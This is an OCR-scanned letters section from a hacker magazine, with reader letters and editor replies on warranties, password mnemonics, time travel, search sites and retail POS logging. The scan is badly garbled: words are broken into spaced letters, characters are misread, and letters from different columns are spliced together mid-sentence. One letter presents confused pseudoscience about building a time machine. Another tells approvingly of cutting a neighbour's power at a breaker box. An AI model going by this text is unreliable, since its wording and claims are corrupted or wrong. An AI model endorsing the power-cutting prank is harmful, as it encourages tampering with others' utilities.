perspecti ve. The URL i s http://www. esqui re. com/
features/essay/davi d-si mon-030S
Other t han that, I l i ked your documentary. I
wi sh it had a better endi ng.
Peter Di Giovanni
Simon 's cynicism about the plight of newspapers
and the media at least led him to write and produce
"The Wire, " a project that finally made the invention
of television worthwhile.
Dear 2600:
I used to col l ect comi cs and was bored one ni ght
and thought " hey, why not read one of those ol d
comi c books you have l yi ng around? " So I di d. Thi s
comi c was Chost Rider 2099 ( i ssue number one,
publ i shed i n 1 994) , an odd futuri sti c versi on of the
ori gi nal comi c publ i shed ( and made i nto a movi e)
by Marvel . I was readi ng t hrough i t unt i l the mai n
character "zero" was speaki ng t o one of hi s cohorts
over a vi deo payphone. When he was report i ng
about the casual ti es of the fight he had j ust escapt,
he sai d " Phrack and 2600 are dead. Warewol f too,
maybe. " A coi nci dence? I th i nk not. Hopefu l l y the
wri ter of Chost Rider 2099 ( Len Kami ns ki ) wasn't
tryi ng to make a statement about Phrack and 2600,
but I thought you wou l d l i ke to know anyways.
lo$er
/, amazing the things you can find by reading
comics. We just hope Warcwolf is OK.
Dear 2600:
Fi rst, I wou l d l i ke to compl i ment you on the
change from a gl ued to a stapl ed bi ndi ng. I t's easi er
to fol d the mag i n hal f and read from edge to edge.
Second, I I ,:ok forward to my new i ssues of 2600
as the a rt i cl es are a l l very cool , i n parti cul ar " Hacker
Perspecti ve" and "Tel ecom I nformer. " I know some
users prefer more tech arti cl es and how-tos but one
can al ways Coogl e, newsgroup, and even read ba
si c stuff l i ke "Hackers for Dummi es" and even the
whol e "Steal thi s Computer Book . . . " seri es.
Lastl y, I enjoy the bl end of phi l osophy, pol i ti cs,
and technol ogy that you ach i eve and wanted you
to know that when you rai se your pri ces i n the ncar
future as I th i nk you must, I wi l l sti l l subscri be. The
mere $6. 25 an i ssue i s penni es when compared to
the wea l th I fi nd i n your mag. I t's the si ngl e most
val uabl e mag that I subscri be to and I have many,
Wired bei ng the worst pi ece of trash, but i t's free.
aurfal i en
Dear 2600:
I j ust fi ni s hed 24: 4 and thorough l y enj oyed i t.
got to t hi nki ng ( yes, most peopl e wou l d rather di e
t han thi n k - i t's so much l i ke work) and deci ded to
l et you fol ks know the v<l ue, enj oyment, and safety
I have recei ved from my readi ng of 2600.
As a phys i ci an I had been in pri vate practi ce
and am now semi - reti red. I managed our admi t
tedl y s mal l , fi ve computers wi th router, hub, etc. ,
network for the i ntegrati ve car e practi ce. Knowi ng
t hat the Wi ndows envi ronment was a maj or prob
l em and nearl y i mpossi bl e to secure, my consul tant
and I chose to use SuSE Li nux S. 2 (yes, a bi t ago)
for the pr i nci pal server, wi th Samba as the i nterface
s i nce we were requ i red to use Wi nBl ow$ XP Pro as
the cI i ent OS due to software i ssues.
Havi ng onl y Knoppi x as my i ntro to Li nux, the
fi rst year was a n i ghtmare of a l ear ni ng curve and
1 -2 am as day's end was common. The SuSE admi n
manual was as frequent an occupant of my desk a s
both 2600 a n d Linux Pro. By t h e second year the
admi n manual was mostl y on the shel f but 2600
rema i ned on the desk.
The move to 9. 2 was a bi t rocky but went okay
overa l l . The equ i pment was HP Pvi l i on 733 seri es.
Whi l e that wasn' t very remarkabl e, HP's pol i cy re
gardi ng t hei r hard dri ves was. I di dn't t hi nk much
about i t when we set up t he server as whol l y Li
nux by t he expedi ent of squi s hi ng Wi nBl ow$ i nto
a l i ttl e bi tty 24 GB parti t i on. Yes, i t sti l l ran but it
was essenti al l y out of my way. I set up my personal
machi ne as a dual boot wi t h Wi n ( 24GB)/Li nux
( 65GB) . I wou l d have di tched Wi n enti rel y but the
offi ce management and EMR was Wi n onl y now,
though ori gi nal l y wri tten for Li nux. I sti l l bl ess Sam
ba and Cups!
Now the oddness. I had <n occasi on that forced
me to Cl l HP for a hardware i ssue. The Ethernet
card mostl y di ed but Wi nBl ow$ saw it as good. I
di dn' t thi nk anyth i ng of answer i ng the tech's ques
t i on about the OS setup and that i t was dual boot
wi th Wi n essenti a l l y compacted. I was tol d that I
had voi d"d my warranty and got hung up on.
After several cal l s and good ol d Mar i ne Corps
stubbornness I spoke wi th a supervi sor that ex
pl ai ned that I had voi ded the hardware warranty by
removi ng the i nstal l ed OS. Then the fur fl ew! I fi
nal l y got a copy of the hardware warranty i n wr i t i ng
and sure enough you voi d i t i f you remove i t. I found
t hi s a parti cul ar l y di st ur bi ng tacti c by Wi ndows/HP.
So after goi ng round and rOLl nd, I fi na l l y convi nced
them that there was noth i ng that prevented me from
a dual boot setup so l ong as I di d not "remove" the
pre- i nsta l l ed OS ( XP-Pro) . Eventual l y the whol e i s
sue was bumped to a case manager who not onl y
was L i nux competent ( and not a l l owed t o address
Li nux i ssups) but understood that I had not voi ded
the warranty and even set up a remote connec
t i on to screenshot and veri fy i t to end the hassl es
downstream and attempts to voi d the warranty. As
it turned out he was a l so a 2600 reader though he
asked me not to repeat that to ot her HP fol k. I t was
t hr ough a 2600 art i cl e that I found a way to test the
e-card from the Li nux parti t i on and the Knoppi x as
wel l determi ni ng t hat the car d was i ndeed bad and
i t was eventual l y repl aced.
So i n cl osi ng, i t was through my usi ng 2600,
Linux Pro, and s i mi l ar peri odi cal s that I l earned
t hi ngs to hel p me protect and servi ce my network
and keep i t up and runni ng. Thank you very much
2600 staff and may the PTB never prevent your i n
formati on from reachi ng those who need i t . I woul d
appreci ate i t i f you woul d j ust us e Dr. C rather t han
my fu I I name. I do haY a few pati ents who are
computer l i terate.
Dr. C.
Pa
g
e 40 2600 Ma
g
azine
Critique
Dear 2600:
In Forensi cs Fear ( 24: 4) , Anonymous Chi -Town
Hacker wri tes a pretty poi ntl ess art i cl e fi l l ed wi th ob
vi ous errors and maki ng vague references to sti r up
some random fear. I j ust wanted to poi nt out a few so
that others woul d see that he's ful l of #@*%. Fi rst, he
starts off wi th cl ai mi ng there's new software that runs
your system and gi ves a process name ( al though
I t can be changed, he cl ai ms) and then goes on to
say that i t runs underneath the as and i s OS- i nde
p

ndent. Wel l , you can't have i t both ways. I f i t's run

ni ng as process, that means i t's runni ng on the as
and, besi des, the onl y t hi ng r unni ng underneath t he
as i s the BI OS. Even the l ow- l evel devi ce dri vers are
OS-dependent and r unni ng wi th the as not under
neath it. You can have OS- i ndependent ource code
(whi ch onl y means i t's eas i l y portabl e), but you can't
ave OS- I nd

pendent programs (except for t hi ngs

l i ke Java,

hl ch std l requi re the OS-dependent vi r

t ual machi ne) . Next, he wri tes t hi s i di oti c sentence:
"Because the pac i s underneath the as, i t has the
abi l i ty to act on a l l 1 0, 000 computers at once. "
WTF? How i t runs on one PC has nothi ng to do wi th
whether i t's connected to other PCs or not. Al so, i f i t's
runni ng under the as, i t's not goi ng to have access
to the ethernet hardware, s i nce the dri ver for the eth
ernet card i s part of the as. So, whi l e such software
m

y or may not exi st and may or may not be in use,

t hi S person doesn't know enough about computers
to be abl e to tel l us anythi ng useful about i t and i s
j ust wri ti ng t o add t o peopl e's fear rather t han a l l ay
it wi th knowl edge.
Gunsl i nger
Other than that, you enjoyed it?
Dear 2600:
I fi nd it i roni c that on one hand a vast maj ori ty
of hackers push for the freedom of i nformati on and
sar i ng of knowl edge whi l e at the same ti me fi ght
vi gorousl y to poi nt out securi ty hol es, pl ug thei r own
securi ty hol es, and fi x those of other peopl e's. Not
onl y that, but whi l e maki ng the cl ai m of freedom
of knowl edge an+ i nformati on, some of these very
same peopl e are In charge of secur i ng networks and
systems whose sol e purpose i s to bl ock access to
t hi s i nformati on ( and I am excl udi ng from thi s those
charged wi th protecti ng Soci al Securi ty numbers,
phone numbers, etc. ) .
I guess i t can be boi l ed down t o "freedom of i n
formati on . . . j ust not mi ne. "
Chris A.
It would be nice to mention some specific ex
amples because it almost seems as if you're claiming
that security holes somehow represent freedom of
information.
Dear 2600:
I ha

e been readi ng 2600 for a coupl e of years

now. Thi s magazi ne can be as addi cti ve as cocai ne.
Tere arc a few thi ngs to be sai d about t hi s maga
Zi ne. I n the fol l owi ng l i st there are more prai ses than
anythi ng el se.
The best t hi ngs about thi s magazi ne are:
1 . Staff l etter comments usual l y have a neutral
and fai r way of expressi on. They aren' t cl ose- mi nded.
Many ti mes they chal l enge readers to t hi nk beyond
thei r normal thought.
2 .
.
Letters seem perfectl ey unedi tted (those typos
were I ncl uded to prove my poi nt).
3. Wi tty or smart remarks on l etter comments are
pretty much al ways j usti fi ed (see page 38, I ssue 25 : 1 ,
l etter by "granny") .
4. Cri ti ci sms and prai ses of magazi ne format and
subject have seemi ngl y al ways been addressed. (Ad
dressi ng these i ssues i s smart si nce you woul d want
to keep readers. )
5 . You pri nt readers' l etters t hat woul d a l most
be a waste of val uabl e zi ne arti cl e real estate. Thi s
seems t o add di versi ty t o t he magazi ne. (Sorry, but
some l etters real l y are a waste of l i nes . . . perhaps thi s
one woul d be i f pri nted. )
Here comes the "di s l i ke" porti on of my l etter:
1 . Spari ngl y, some of the art i cl es are bori ng. I
detest readi ng some perspecti ve of a non-i nteresti ng
tOpi C.
2 . Some arti cl es, not j ust reader suppl i ed art i cl es,
are a bit too pol i t i cal or they ki nd of make me thi nk
t he author has trust i ssues ( paranoi d, i f ya know what
I mean) .
Ul ti matel y, not al l t he arti cl es pri nted can sati sfy
e
.
veryone .
.
I appreci ate the fact that you pri nt a di ver
sl
.
ty of art i cl es and l etters, even i f they are bori ng or
kl nda stupi d (sorry, agai n) , because t hi s s hows your
support of t he freedom t o share i deas and t he free
dom to speak your mi nd. Al so, I wi l l concede that
someti mes bei ng too rel axed wi th our i nformati on
or even our freedom, can be dangerous and a l i ttl
paranoi a can be safer.
.
Next matter, I ssue 25: 1 , the fi ct i onal story "To
Ki l l an Atomi C Subwoofer" was an i nteresti ng story.
Not because It was good, but because ( si nce I don't
read the TOC fi rst and di dn't see "story" precedi ng
t he name) I t w
?
S a mean t r i ck t o me. I t ook readi ng
It ser i ousl y at fi rst, though I suspi ci ousl y read it as a
story rather than art i cl e. After readi ng about a thi rd of
the arti cl e ( maybe l ess), I real i zed that i t was a l l crap.
I may not know too much about radi o waves but
when someone says somet hi ng l i ke " I may not know
too much about radi o waves" it is usual l y a si gn that
they don't know what they are tal ki ng about ( pl ease
do not rel ate that l ast comment to the whol e of thi s
l etter). I fel t pretty decei ved, as wel l as t he rest of us
"tabl e-of-content-readi ng-chal l enged" peopl e. Even
though I have a coupl e of di s l i kes about t hi s maga
Zi ne, the l i kes very much outwei gh the di s l i kes.
I l i ve i n Chi cago, so I coul d i magi ne what i t
wou l d be l i ke for them to tear down a pi ece of hi s
tory from our great ci ty. To end my arti cl e, I l eave a
quest i on. Do you real l y i ntend to stop HOPE after
seven conventi ons i f they deci ded to tear down that
New York hi stor i cal masterpi ece? (Thanks for maki ng
? great magazi ne and sorry to hear about the pend
I ng fate of the Statl er Hi l ton. )
Shocked998
We do in fact edit letters. If we didn't you would
have great trouble reading a lot of what is sent to us.
Plus, spelling and punctuation errors are no fun for
anyone. With a few special exceptions which come
along every now and then.
.
And again, specifics are always nice when say
mg, for example,
.
that a viewpoint is paranoid. It gives
us the opportunity to counter the point, assess our
Summer 2008 Pg
e 41
own beliefs, and mark you down as part of the con
spiracy.
Oddly enough, the sarcastic reply you mention in
item #3 has apparently been taken as gospel by some
people, as our first letter writer attests.
As for the fate of the hotel, we have one last
hope. And we hope you're a part of it.
Dear 2600:
In I ssue 25: 1 I can't hel p but noti ce the si mi
l ari ty between t he arti cl e "Pssword Memori zati on
Mnemoni c" and my own paper, "Mnemoni c Pss
word Formul as," whi ch was publ i shed l ast year i n
Uninformed Journal Vol . 7 (May, 2007, http://www.
uni nformed. orgl?v7) . The arti cl e was at best si mpl y
an under-researched arti cl e as there are other mne
moni c techni ques that are much more effective than
the templ ate (formul a) techni que descri bed, and at
worst a watered down pl agi ari sm of my paper, even
retai ni ng the overal l subject matter l ayout, sans
overvi ew of previ ousl y establ i shed and documented
techni ques. The techn i que presented in the arti cl e i s
essenti al l y a si mpl i fi ed versi on of the techni que de
scri bed in my paper, however I ' l l gi ve the author the
benefit of the doubt and assume (s)he di dn't read up
on the subject as there were zero references or ci ta
ti ons i ncl uded wi th the arti cl e. For readers curi ous
about the subject of mmpl ex password creati on and
recal l , I advi se readi ng through the pri or art ci ted by
my paper and fi ndi ng a techni que that i s comfortabl e
for the reader.
Druid
Dear 2600:
Stop your inresponsible word! Ti bet is, was and
al ways a part of Chi na, that no doubt of i t, pl ease
stop your i gnorant words i f you know nothi ng of Chi
na. Chi na i s a beauti ful , great country, wel come to
Chi na to see every thi ng wi th your own eyes and get
your own concl usi on. We can't tol erance someone
spl i t our country, we can fi ght to the death !
i ndiana_lau
How about you go and fight to the death and we
can try and figure out just what in hell you're going
on about and why you think it has anything at all to
do with us.
Dear 2600:
umns l i ke "Tel ecom I nformer" and "Hacker Perspec
ti ve" form a great conti nui ty between i ssues. And I
defi ni tel y appreci ate the orderi ng of the fi rst set of
arti cl es, drawi ng a l i ne from one Vol P arti cl e to an
other, and between the Barcode and RFI D arti cl es.
Al though the qual i ty of everythi ng i s very hi gh, I
woul d especi al l y l i ke to si ngl e out for prai se Phl ux's
arti cl e on gang si gns. It's wel l wri tten, left fi el d from
your usual contri buti ons, sure, but sti l l fi ts perfectly
with the hacker mental i ty of expl orati on and cre
ati vi ty. Oh, and cheers for goi ng back to the stapl ed
spi ne, it a l l j ust feel s much more sol i d to me.
On another note, I 'd j ust l i ke to say i n regards to
the di scussi on around whether 2600 i s gett i ng "too
pol i ti cal , " that anyone who thi nks that the hacki ng
worl d i s di vorced from the pol i ti cal i s l i vi ng wi th a
cardboard box over thei r head. Sure, i n an i deal worl d
there's "expl ori ng technol ogy" on t he one si de, and
pol i ti cs (al l that stuff about war, taxes, i mmi grati on
etc. ) on the other. But i n the real worl d, i n thi s day
and age, when "expl ori ng technol ogy" i s outl awed
by the state in so many ways ( and i ncreasi ngl y so),
and when our personal freedoms are bei ng eroded
usi ng the same technol ogi es we want to expl ore,
wel l , the pol i ti cs comes to us. The hacker mi ndset
has never been about s i mpl y di smantl i ng a radi o i n
an i sol ated l a b somewhere - i t's al ways been about
the soci al context that our technol ogi es are used i n.
And when that soci al context changes - becomes
"pol i ti cal " - so "hacki ng" changes too. Li ke i t or not,
hackers, and magazi nes l i ke 2600 whi ch represent
us, are on the front l i ne ri ght now, because i t takes a
hacker mi ndset to fi rst see what's goi ng on wi th some
of these i ssues. I t' l l be hackers that uncover root ki ts
in Sony DRMed CDs, i t' l l be hackers that di scover
how much survei l l ance we're under from our respec
ti ve governments, i t' l l be hackers that reveal to the
worl d the abuse of our personal data by corporati ons
and government agenci es around the worl d. And thi s
a good thi ng - thi s i s the way i t' s meant to be.
iivix
Projects
Dear 2600:
I ' m a student at Col umbi a's graduate school of
j ournal i sm and I ' m putti ng together a letter to the ed
i tor mash-up for the New York Review of Magazines
(see l ast year's edi ti on at http://www. nyrm. orgl), tak
i ng di fferent sentences from di fferent unpubl i shed
letters and Frankenstei ni ng them i nto a cohesi ve
whol e.
The goal i s to form the type of l etter one woul d
real l y want t o see: Funny, crazy, but curi ousl y on
poi nt. I n other words, Readers: Here's what a letter
to the edi tor should l ook l i ke.
Some of the letters I 've seen i n 2600 are fantas
tic ( I ' m thi nki ng in part i cul ar of the cease-and-desi st
from General Motors), and i f you contri bute a l etter
or two - or si x, that woul d hel p us take t hi s short
pi ece to a h i gher pl ateau.
I n t he edi ti ng, I ' l l footnote each sentence t o show
where letters came from, but l eave the wri ter anony
mous.
So pl ease contri bute! You can reach me by phone
or e-mai l i f you have questi ons. The deadl i ne for the
rough draft i s Tuesday, March 4th.
I ' m j ust droppi ng you a qui ck note from the UK
t o tel l you how i mpressed I was wi th your Spri ng
2008 i ssue. I 've been readi ng 2600 si nce 1 993, and
I can honestl y say that thi s i s your best i ssue yet. I f I
had to show someone j ust one i ssue of 2600 to i l l us
trate what it's al l about, thi s woul d be the one. You've
managed to cover the whol e scope of the hacki ng
worl d, from begi nner's tutori al s l i ke "Uses for Knop
pi x" through to the advanced "Eavesdroppi ng wi th
LD_PRELOAD" (whi ch I barel y understand, but sti l l
enj oyed readi ng). You've covered everythi ng from
the l egal i ssues, through the usual scams and pranks,
to expl orati on of new technol ogi es, wi th not a dul l
arti cl e amongst them. You've got t he dr y techni cal
arti cl es mi xed wi th some more personal expl orati ons
( l i ke "A Cl oser Look at Wi ki pedi a" by Barrett Brown
and "To Ki l l a Subwoofer" by Di onysus - more l i ke
these pl ease. Even if the l atter was total BS, these are
engagi ng and i nspi rati onal reads. ) The regul ar col -
dave
Pa
g
e 4
2
2600 Ma
g
azine
Sounds like a great idea and we're certainly open
to this sort of thing. But we have all we can do to
go through thp pilps of INters that com" in anci sp
lect which ones to print without also responcing
to a whole other pile of project ideas like this one.
We didn't even seC your leller until well past your
deadline, not that WC likely would havC had timC to
respond if we had seen it before. So for the future, by
all means, do something artistic with our stuff Just
give credit and let us see what you come up with.
Dear 2600:
I am wr i t i ng you thi s l etter to ask for your hel p!
I have di srespectful nei ghbors and thei r vi si tors.
They bl ast t hei r stereos at al l hours of the n i ght. I s
there a ci rcui t I can bui l d or buy t o di srupt or turn
off the stereo?
David
If the fictitious solution we printed last issue
doesn't help you, perhaps the following real worfd
account will.
Dear 2600:
I read your "To Ki l l an Atomi c Subwoofer" arti cl e
and was di sappoi nted at t he end t o see t he note that
i t was fi ct i on.
However, i t brought to mi nd somethi ng t hat actu
al l y happened to me. Thi s was a l ong ti me ago i n a
gal axy far far away as the sayi ng goes.
No l i e, I was studyi ng to be an el ectroni cs techni
ci an i n Kansas Ci ty. The ol d apartment bui l di ng I was
l i vi ng i n was a bi t run down and had al l manner of
tenants.
One day I was tryi ng to sl eep i n preparati on for
an i mportant test the next day and the apartment be
l ow had the stereo goi ng ful l bl ast, preventi ng any
thought of sl eep.
As I l ay i n my bed contempl at i ng my opti ons, I
thought of knocki ng on the door and aski ng n i cel y,
but gi ven the nature of some of the tenants I scratched
that (I di d want to l i ve to take the test the next day).
My mi nd dri fted to somethi ng I had seen i n the
basement next to the storage bi ns: a breaker box.
I crept down the stai rs and entered the basement.
Loomi ng i n the dark was that breaker box. I opened
the unsecured cover and 1 0 and behol d each breaker
swi tch was l abel ed wi th the apartment number. A
fl i ck of the swi tch and my path to sl eep and an A on
the test the next day was "i n the bag."
The next morni ng as I was l eavi ng I saw that a
KCP&L truck had shown up and was puzzl i ng over
the si tuati on. "Damn, must have been them there
powerful speakers i n your stereo."
Breaker Boy
Dear 2600:
I have been a l ongti me reader of your excel l ent
magazi ne but t hi s i s my fi rst submi ssi on and woul d
l ove t o see i t publ i shed. I 've had t o use my real name
on the return address whi ch I trust wi l l be wi t hhel d.
freedom of i nformati on t o the hacker subcul t ure. Any
i nput, content suggesti ons, stor i es, or arti cl es can be
submi tted to Systemfai l ure, S. 2OO Spruce Ct. , Post
fa l l s, 1 0 83854.
I nmate #21 0266
Responses
Dear 2600:
Thi s is a response to Jesse's l etter on t i me travel
in 24: 4. It is good to see you're thi nki ng and tryi ng to
unravel the u ni verse but I am goi ng to have to break
your cosmi c bubbl e. Let me sta rt by sayi ng yes, many
sci enti sts do bel i eve t hat t i me travel i s possi bl e ( I do) .
However, you seem to mi sunderstand a few of the
concepts. Ti me does not necessar i l y move i n onl y the
forward di recti on; Steven Hawki ng has defi ned the
concept of t i me's ar row poi nt i ng one way but thi s i s
not proven and has i n fact been di sproven by many
physi ci sts ( read some Br i an Greene) . Now on to your
t i me machi ne: "wrong oh, Buckaroo Bonzi . " Your
basi c concept i s sound, research "the twi n paradox,"
but the probl em i s i n the energy and speed requi red.
I n order for thi s to work, for more than a few mi l
l i seconds of t i me gai n, you woul d have t o travel very
very cl ose to the speed of l i ght. The probl em wi th
that i s, as Ei nstei n descri bed, as you approach the
speed of l i ght, mass i ncreases. I f thi s i s the case as
the mass of your shi p i ncreases, the force requi red
to push i t has to i ncrease. At the speed of l i ght mass
i s i nfi ni te, so i t woul d take al l the force i n the uni
verse t o move t he s hi p. So, at speeds near t he speed
of l i ght you woul d need nearfy al l the force in the
universe to move i t. A more sound way of achi evi ng
t i me travel , i n both di recti ons, i s t o l i teral l y tear t he
universe a new space hol e. I n the i nterest of brevi ty I
wi l l keep t hi s short and sweet. If you coul d i sol ate a
mi cro-si ngul arity, whi ch appear and i nstant l y di sap
pear around us a l l the ti me, and then i nject i nto i t a
n i ce chunk of ant i gravi ty (the opposi te of a gravi ty
part i cl e) , you woul d create a worm hol e i n space
ti me j oi n i ng to previ ousl y unj oi ned poi nts. One end
of thi s worm hol e coul d then be spun near the speed
of l i ght ( negl i gi bl e mass), for, say ten years, whi l e the
other end i s kept fi xed. The resul t of t hi s woul d be
a time machi ne. You woul d have a worm hol e that
connects two poi nts i n space, where one end exi sts
ten years in the ( rel ati ve) future whi l e the other i s
t en years i n t he ( rel ati ve) past. You coul d t hen pass
anythi ng t hrough t hi s and move i t ei ther ten years
i nto the future or ten years i nto the past. Paradoxes
abound ("grandfather, " "conservati on of mass/en
ergy," etc. ) but al l of these have been addressed and
the theory sti l l proves t o be sound.
My credent i al s: Degrees i n chemi stry and math
emati cs and my hobby, besi des the occasi onal hack,
i s part i cl e physi cs.
Al so, I recommend you do read Br i an Greene for
more i nformati on, but read wi th cauti on. Hi s back
ground i nformati on i s very cl ear and accurate but he
j umps to some non-sequi t ur concl usi ons.
Emperor
We would really like this issue to be resolved one
way or another as soon as possible. Is that too much
to ask?
Dear 2600:
I am currentl y compi l i ng art i cl es and short stori es
for a websi te that is to be l aunched upon my rel ease
from i ncarcerati on at the end of J ul y. We hope the
securi ty mi nded si te wi l l prove to be a pl ace for l i ke
mi nded i ndi vi dual s l i ke your readers ( i ncl udi ng me)
to submi t arti cl es regardi ng anythi ng from i nforma
ti on systems securi ty - or l ack of - and the pursui t of
Fi rst and foremost I woul d l i ke to say kee
p
up
Summer 2008 Pa
g
e 43
the great work. I l ove your mag and have been read
ing for cl ose to a decade, though I mi ss the page 33
di fferences that used t o appear i n ol der i ssues. I n i s
sue 24: 4 Jesse put forth a theory about ti me travel . I t
has one probl em s ummed up i n two words: Stephen
Hawki ng. He deci ded to wri te a book cal l ed A Brief
History Of Time back in 1 998. Not that I am tryi ng to
cast doubt upon the ori gi nal i ty of J esse's thought, but
i t i s as though hi s/her theory was pul l ed di rectl y from
the pages of Mr. Hawki ng's book.
Omega_I teration
Dear 2600:
I was readi ng the art i cl e in the Wi nter 2007's
2600 i ssue about decrypt i ng the ROT- 1 3 on Experts
Exchange, and the arti cl e ended by sayi ng they don't
use ROT- 1 3 anymore; they're actual l y "protecti ng"
i t now.
Wel l , okay, but they're not protecti ng i t. Thi s was
true back when they were doi ng the ROT- 1 3, but. . .
c' mon, guys; al l you had t o do was scrol l down.
Exampl e at http: /www. experts-exchange. com/
Web_Deve l opmentlWeb_Languages- Sta nda rds/
PHP/Q_2 2 1 07984. ht ml
Zach C.
Dear 2600:
I ' m wri ti ng t hi s in response to the arti cl e "Decod
i ng Experts- Exchange. com" wr itten by Phatbot.
I al so used to get frustrated when searchi ng for
i nformati on on sol uti ons woul d return resul ts that
seemed to be dead on, but hosted at expert-ex
change. Unt i l I noticed that the Googl e resu l ts were
l i sti ng text from the potent i al sol ut i on. You and I both
know that Google onl y i ndexes what i t sees when it
vi si ts the si te. So one day, I l oaded the cached page
i nstead and used the fi nd in my browser to l ocate the
keywords that Googl e returned for my resu l ts. Guess
what, Experts-exchange has been fool i ng us a l l ! I
real i zed that if I paged down several pages, the ac
t ual sol uti on i s there i n pl ai n text. Recentl y, I noti ced
they have added a l ot more pages of garbage before
showi ng the pl ai n text, but i t i s sti l l there.
What I rea l l y hate are the search engi ne s ni pe
si tes that pi ck up on the terms you are searchi ng for
and ret ur n what l ooks l i ke a sol uti on when a l l you
fi nd at the si te i s search res ul ts for t hei r brai n dead
search engi ne or worse yet a dri ve by down l oader.
Hope t hi s hel ps tame your frustrat i on.
Exo
Dear 2600:
In response to the "Hacker Perspecti ve" art i cl e
i n t hi s newest i ssue, I wrote a program t hat wi l l per
form searches at mul t i pl e search engi nes of random
search terms at an i nterval speci fi ed by the user. Do
you have any i deas on how I can get thi s out to the
peopl e? I t i s of course open source.
Rob
One really swell way would be to send us the
program or give us a link or something - anything.
Dear 2600:
Possi bl y Var i abl e Rush's art i cl e on Knoppi x ( 25: 1 )
has tri ggered a rash of responses l i ke t hi s. As VR di s
covered, the use of Knoppi x to recover a Wi ndows
system i s l i mi ted by the fact that Knoppi x does not
have a l i cense to wri te to NTFS formatted di sks. A
much better recovery tool is " Li ve Wi ndows." Thi s
can be found at www. ubcd4wi n. com and i maged
onto a CD. Once booted from the CD, i t is abl e to
wri te to NTFS di sks and contai ns a sui te of tool s that
al l ows you to do consi derabl e emergency surgery on
a fai l ed system, i ncl udi ng changi ng both account and
CMOS passwords, al though tamperi ng wi t h CMOS
wi th software not or i gi nat i ng from the CMOS manu
facturer may not be a good i dea i n every case. A fai l
ure t o wri te t o t he CMOS correctl y coul d scrambl e
the CMOS enough t o requi re repl aci ng the mother
board, so I have not tri ed t hi s parti cul ar uti l ity.
Us i ng a Li ve Wi ndows CD, I have been abl e to
successful l y recover several Wi ndows systems that
have crashed or been l ocked out for vari ous reasons
and get them back on the road. The onl y snag i s that
l i ke any " l i ve" CD, i t i s l i mi ted by the computer's abi l
i t y t o boot from a CD. I f t he BI OS does not al l ow thi s
you are stuffed . . . unl ess anyone knows di fferent?
Peet the geek
Dear 2600:
I am wri ti ng thi s l etter in response to "Transmi s
si ons" i n 2 5 : 1 . The art i cl e suggests t hat the reason
Ti me Warner i s pl ayi ng wi th thi s i dea i s a total l y ma
l i ci ous one that i s ai med at hol di ng back i ts custom
ers j ust to i ncrease i ts monetary i ncome. Whi l e, yes,
the reason for pl ayi ng around wi th t hi s i dea defi ni te
l y has to with money, i t i s not meant to be mal i ci ous
or control I i ng.
As an empl oyee of the company, I heard about
thi s qui te some t i me ago ( about si x months ago to be
exact) . One of the mai n reasons that they are actu
al l y toyi ng wi th thi s i dea to l i mi t bandwi dth i s be
cause when they l ooked at thei r traffic stati sti cs for
2006, they saw that over 90 percent of thei r avai l
abl e nati onwi de bandwi dth was bei ng used for peer
to-peer shari ng, whi ch onl y accounted for roughl y
ten percent of t hei r subscri ber base. Put pl ai nl y, ten
percent of our customers use over 90 percent of
the nati onwi de bandwi dth whi l e 90 percent of our
customers use l ess than t en percent of t he avai l abl e
bandwi dth.
Noti ce that I sai d "avai l abl e bandwi dth," not
"bandwi dth used. " Basi cal l y, Ti me Warner i s run
ni ng out of bandwi dth. And i nstead of i ncreasi ng
t hei r bandwi dth ( as t hat woul d cost money), they are
t hi nki ng of i mpl ementi ng thi s pay by usage i dea.
Thi s i s of course abs urd and I do not agree wi th
i t i n the s l i ghtest, but I j ust thought that maybe you
shoul d know a l i ttl e more of what i s goi ng on behi nd
t he scenes.
Unr3al
Dear 2600:
Fi rst, I woul d l i ke to t hank you for your response
to F33dyOO's l etter i n 24: 4 on the topi c of Target's
i n store network secur i ty. I was gl ad to see that you
guys recogni ze that peopl e wi th techni cal capabi l i
ti es someti mes have t o occupy mundane jobs t o pay
the bi l l s . I was one of those peopl e mysel f for the
better part of a decade.
Movi ng on, though, I woul d l i ke to confi rm the
i nformati on presented in the ori gi nal art i cl e ( 24: 3
"Target: For Credi t Car d Fraud") . I l eft Target for a
programmi ng j ob about three years ago, but i n my
Pa
g
e 44 2600 Ma
g
azine
t i me occupyi ng vari ous posi ti ons at three di fferent
Target stores, I recogni zed the same fl awed setup at
each store. The POS systems (at the ti me) were noth
i ng more than Wi ndows NT machi nes that had POS
software run n i ng on them. Those machi nes trans
mi tted transacti on i nfo to the store's server as the
transacti ons were processed. Thi s i nfo was typi cal l y
stored for up t o a month i n case there was any need
to recal l i t and even though the credi t card number
i s obscured on the recei pt, i t i s not obscured i n any
way once you have access t o vi ew i t i n the store's
transacti on l og.
That's j ust my $. 02 on the topi c. Thanks for put
ti ng out a great mag.
Ed
Dear 2600:
I n response to Agent ZerO's art i cl e "Password
Memori zati on Mnemoni c, " I thi nk the methods de
scri bed aren't much better than usi ng the same pass
word for every account.
Let's say I ' m sni ffi ng traffic at a coffee shop and
see you l ogi n t o MySpace wi th the emai l agentzrO@
gma i l . com and the password myspaceFz2 ! mROO.
You can bet my fi rst password guess on your gmai l
account wi l l be gmai I Fz2 ! mROO. Hel l , I mi ght a s
wel l try paypa l Fz2 ! mROO a n d wachovi az2 ! mROO.
The danger of mnemoni cs for passwords i s that i f i t's
easy for you, i t's easy for an attacker too. Here, i n my
opi ni on, is a better way of doi ng password securi ty.
Use a di fferent compl etel y random password for
each account. I l i ke usi ng the program pwgen to gen
erate random passwords. There are several websi tes
that can do t hi s for you as wel l . Keep a l l these pass
words in a text fi l e on your computer. The passwords
you use most often you' l l end up rememberi ng, the
rest you' l l have to look up in t hi s f i l e.
But don' t l eave i t i n j ust any text fi l e on any com
puter. Use whol e-di sk encrypt i on. Debi an, Ubuntu
( al ternate CD) , Fedora Core, and probabl y more Li
nux di stri buti ons come wi t h whol e-di sk encrypt i on
bui l t i nto the i nsta l l er. I f you use Wi ndows, PCP
Desktop i s a good choi ce.
Use PCP as wel l (or gpg, i f you're the Free Soft
ware type). Everyone shoul d be usi ng t hi s for ev
eryday emai l encrypti on, but i t's al so very useful
for encrypt i ng fi l es on your hard dri ve. Keep your
password fi l e encrypted wi th your PCP key. When
you del ete your temporar i l y u nencrypted password
fi l e, use a program l i ke wi pe or shred so it can never
be recovered i f your computer ever got stol en and
the t hi eves ever managed t o break your whol e-di sk
encrypti on.
Thi s mi ght sound l i ke a very compl i cated and
paranoi d way of doi ng thi ngs, but i t rea l l y i sn't too
bad for your everyday computer nerd, ass umi ng you
regul ar l y use PCP. And these are thi ngs that i t's good
